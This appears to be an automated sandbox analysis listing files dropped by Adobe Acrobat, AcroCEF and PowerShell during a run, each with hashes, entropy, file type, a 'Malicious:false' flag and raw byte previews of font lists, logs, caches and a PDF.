                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:PostScript document text
Category:dropped
Size (bytes):10880
Entropy (8bit):5.214360287289079
Encrypted:false
SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:B60EE534029885BD6DECA42D1263BDC0
SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:false
Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:data
Category:dropped
Size (bytes):4
Entropy (8bit):0.8112781244591328
Encrypted:false
SSDEEP:3:e:e
MD5:DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:false
Preview:....

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):2145
Entropy (8bit):5.071787986230253
Encrypted:false
SSDEEP:48:YsXXaUOAYLTe37hilbinCICj460nbawdPT98a7:n60SunCIY46qp58o
MD5:15A7231B8B4D95FBCA1B030DAC114BE9
SHA1:63F542FD06A77AA83D6C39FFFFD23EE000C02ED7
SHA-256:67FC37AB8ED18AAAF8841B6848B5B3BE3750D1799533C1056BF0515EF940FA5C
SHA-512:0E8FFA036CE5DB973220FE34D03D2C62F9B7374B80FBC3E5A44A9AADB774F359273D543800DA25A2D5BA33A323EF0F46B6C19B92DE66BB26F1CBA39C665897DD
Malicious:false
Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1733496786000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"07c63119417f700c18d92edf3f79d790","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696501843000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d487203459a12b3808bd4198c8ea945e","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696501843000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"8cb00af458b1bdce0dda3ae2e7bb4e0d","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696501837000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"a50f600a3876e29b46e72f860f9824b0","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1696499443000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"19cba2a528c79b7972b63d98e305eda1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696499443000},{"id":"Edit_InApp_Aug2020","info":{"dg":"2b9a96ea

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Category:dropped
Size (bytes):12288
Entropy (8bit):1.321169138197915
Encrypted:false
SSDEEP:24:TLKufx/XYKQvGJF7urs9O3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6Y3O+EXSqXl1:TGufl2GL7msUKB0M0+Tb608Y3XrPW
MD5:4BC78EFEB8EC60ACDB2D5DE128CAA07B
SHA1:1BAA8DA4318068417B2405AE6BF0320A9BA3CA83
SHA-256:7B4005FF128B79F52950B2F7C230AF02973EB4C05776B9E58F22670A452566AC
SHA-512:11622751C43C3E2DDE318E68383411266BDCF7AFF1C566C7987C40617B111D4B911CC28733B8CFC7CE6D281EF3517C144B47458465B42AD2E88A27A9E33AE862
Malicious:false
Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:SQLite Rollback Journal
Category:dropped
Size (bytes):8720
Entropy (8bit):1.7824434499655948
Encrypted:false
SSDEEP:24:7+ttwl3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6Y3O/EXSqXlyGKaitqLhx/XYKQn:7MsKB0M0+Tb608Y3GrGKxqFl2GL7msM
MD5:52FB559F8209EC1907FF059E7E77ABAD
SHA1:24F12C2978DD9C169C80E68733689A09268B75F2
SHA-256:8A9BFC0EFD54ADDBCB520BCF8A005F4024C57F97391E3516A88630DF33CB3D8F
SHA-512:4E0CBB5D2BCB8CD8988761641C9A88232D97C936FB702AFCA06F54400234BA758634595ED2F406558BEFF3C8E5E7097832F528C0172F2CAEE0D3B7BB9747D231
Malicious:false
Preview:.... .c........!..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:data
Category:dropped
Size (bytes):66726
Entropy (8bit):5.392739213842091
Encrypted:false
SSDEEP:768:RNOpblrU6TBH44ADKZEgWz65W4Pc6FOaoS7O5dYKCbACCOVYyu:6a6TZ44ADEWz4c6FOaoa8yVK
MD5:36133164BAB9E9DAB96EB54BC2B08CDF
SHA1:81E431B66257F218E2D207F17F48AE7A83B17F19
SHA-256:26D38D68D1AB94AA7B2CBC3D7F067537AFA2DABC7B95A10E6E3377CA39457298
SHA-512:F61B69DEA6A9A7A3470AD45EDD5A7A2A357506FC9BD672AEDB7BF16C4A0E0D818876066A711B36BDB7AEB504A292F9FCD06FD4E17528CC749E77E06E07B3F299
Malicious:false
Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Preview:@...e...........................................................

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):246
Entropy (8bit):3.5390718303530573
Encrypted:false
SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8V6qLm:Qw946cPbiOxDlbYnuRKkbm
MD5:95F8785FC6BE283D52D2EDF4110CFC9A
SHA1:86F2E72A4F521EE2F06F3EBE4A0A78870A4869A8
SHA-256:18EA2CBD09668BD983E8831FE3A3B84BEA702D12DEC0ECFFB2CCE9D7A7280B31
SHA-512:7CF70E25C32656FB981703B4DDDCE868504CCFF8DDC165582D3D7D073853B31133E5CEF74D0C89662F480F7373F8A75783A1939B722CB248404ECC3DF23454B6
Malicious:false
Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.6./.1.2./.2.0.2.4. . .0.9.:.5.3.:.1.4. .=.=.=.....

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:ASCII text, with very long lines (393)
                                                            Category:dropped
                                                            Size (bytes):16525
                                                            Entropy (8bit):5.361022727805069
                                                            Encrypted:false
                                                            SSDEEP:384:cBD67lQV4j1MOuD/btX+wknz+fzTqyorqz3tVFr84AbAYpfFWbWt+Fjwn0z5O+Wf:4M5
                                                            MD5:70A2D078BEFD5E910EE035832171B399
                                                            SHA1:1AB91914ECD7852E512C73437D30013594A16FB0
                                                            SHA-256:2B55DE84E5446FD295128DAD5827122E98AC784F96A1F422B711B14E8F7DB1ED
                                                            SHA-512:9FF36D4E320A8791AB0B87F24CAB4CBE777D9E8A3A64D26AF419132CDFDFCCD9A253EE9854032C4C87C546187951077F869CBCBDC9513278C557FC4895C7DBBC
                                                            Malicious:false
                                                            Preview:SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:158+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):15114
                                                            Entropy (8bit):5.3692664876517435
                                                            Encrypted:false
                                                            SSDEEP:384:BWdHBHIH5A9A8AuIAoA3AHAeAAA9hljh9jmjwjmj4tQB1gVg2g5gGOUxUZUjSF94:BmhoZojjIbG0rhATjPykqUin65guY4eP
                                                            MD5:5DF3AB20D4BC5625DA58EE1AF69B3BED
                                                            SHA1:AED241E2F3D88AD7161D9E36C4A23682F9246E6D
                                                            SHA-256:FC265157E3C4BC621629EE10CE6A6864585C3F89C8A16B1E9BDA97F763D03482
                                                            SHA-512:C8781B3AF42473CC0A5752F4E12DCF2469320545EC33EF3B18B223C2386127935E39B791DE84CFD4F43005F563C9932C7B38B321481DE8BA5E087F6478BE0C54
                                                            Malicious:false
                                                            Preview:SessionID=78135a7e-ce9a-4150-b393-4fcdb397b219.1733496785550 Timestamp=2024-12-06T09:53:05:550-0500 ThreadID=8416 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=78135a7e-ce9a-4150-b393-4fcdb397b219.1733496785550 Timestamp=2024-12-06T09:53:05:551-0500 ThreadID=8416 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=78135a7e-ce9a-4150-b393-4fcdb397b219.1733496785550 Timestamp=2024-12-06T09:53:05:551-0500 ThreadID=8416 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=78135a7e-ce9a-4150-b393-4fcdb397b219.1733496785550 Timestamp=2024-12-06T09:53:05:551-0500 ThreadID=8416 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=78135a7e-ce9a-4150-b393-4fcdb397b219.1733496785550 Timestamp=2024-12-06T09:53:05:552-0500 ThreadID=8416 Component=ngl-lib_NglAppLib Description="SetConf
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):29752
                                                            Entropy (8bit):5.412324943833884
                                                            Encrypted:false
                                                            SSDEEP:192:zcbaIGkcbIcbiIICcbBOQQ0fQNCHPaPOhWPOA3mbSAcbsGC9GZPOdIzZMJzV3ZmP:EGvIcNYdXtS
                                                            MD5:669892E3C32B53E0DFB163235B07867B
                                                            SHA1:791FCD4E644F0EB616A943869D5554CFC208D7F9
                                                            SHA-256:49012EB2AFF473ECAB20A76F62A94E62AEC07A24FCBB957449215BF1AB77E761
                                                            SHA-512:032F3849A2589D41FF2F7CEA2AED57C5911AC36ED6B262EAEED4AA81BD503B7794C40A36B27C268C70398F62EE507E84C341486799ED819D909F0EB08E2C27D7
                                                            Malicious:false
                                                            Preview:05-10-2023 11:50:33:.---2---..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 11:50:33:.Closing File..05-10-
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                            Category:dropped
                                                            Size (bytes):758601
                                                            Entropy (8bit):7.98639316555857
                                                            Encrypted:false
                                                            SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                            MD5:3A49135134665364308390AC398006F1
                                                            SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                            SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                            SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                            Malicious:false
                                                            Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                            Category:dropped
                                                            Size (bytes):1407294
                                                            Entropy (8bit):7.97605879016224
                                                            Encrypted:false
                                                            SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                            MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                            SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                            SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                            SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                            Malicious:false
                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                            Category:dropped
                                                            Size (bytes):1419751
                                                            Entropy (8bit):7.976496077007677
                                                            Encrypted:false
                                                            SSDEEP:24576:/VRaWL07oMYIGNPHGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tRaWLxMZGBGZn3mlind9i4ufFXpAXkru
                                                            MD5:88DBC4FAE46D0D16E3CF736C68612A35
                                                            SHA1:17789925B3BBF8336D28BCFD698E6C0520A8A6C7
                                                            SHA-256:0CAE3C61EB418C13ABB16D8DB85C7B7199AF31768750F5EA05FFD3868DAAA030
                                                            SHA-512:67C286755521835FB72773EDCE1514FD65DB28A4E1856B7B53CE2383EA50C9125FF507484964803BA9B0BE83D7E86C8DE8E17D837AB42ECA713E607C17875D81
                                                            Malicious:false
                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                            Category:dropped
                                                            Size (bytes):386528
                                                            Entropy (8bit):7.9736851559892425
                                                            Encrypted:false
                                                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                            Malicious:false
                                                            Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:PDF document, version 1.7, 1 pages
                                                            Category:dropped
                                                            Size (bytes):126079
                                                            Entropy (8bit):7.943849374898452
                                                            Encrypted:false
                                                            SSDEEP:3072:491AUlpumVlx1KDctCivx/JII6GE2XAYX:7wFVlxtvxXE2XL
                                                            MD5:883B3959460633ADD1FDDEB2B3060765
                                                            SHA1:A70C7DEB8F428678A43156C08267568984D0B712
                                                            SHA-256:82C26B4F1DE6AC3DB8689BDF21D64B63837DF027F37EA6878F799B5CB4D65596
                                                            SHA-512:EFCC6208349802B6EC36DF856718AD91C63A6D13FDBA712635D84A880269C0357B009D8A710B2CFECEB77AE07B46DC9BC84F4053F4E45C56FE4778A5A464E7BF
                                                            Malicious:false
                                                            Preview:%PDF-1.7.%.....1 0 obj .<<./ColorSpace /DeviceRGB./Subtype /Image./Height 1083./Filter /FlateDecode./Type /XObject./Width 851./BitsPerComponent 8./Length 125221.>>.stream.x...e.$..q\.{..................].w..n..Cp. y...../gU...cHf_.f..]ud.-.SU.S.%I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I..*~....=.$I.$I.....W_..CH.$I.$I~.......!$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I2@|..}...{.{...[n....r.SO=....kp.-I.$I.?/....?.O?....|....{pO:I.$I.dHd...Z..b.5..K~...=.$I.$I.!..g.q.:..J..f.].7.x..tP.NN.$I.$.`!..Xc....n6h.h...o..F.)._.$I.$.`$..4.L...O.7hx...9...2._.$I.$.`...z....G........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6220
                                                            Entropy (8bit):3.7365847207756384
                                                            Encrypted:false
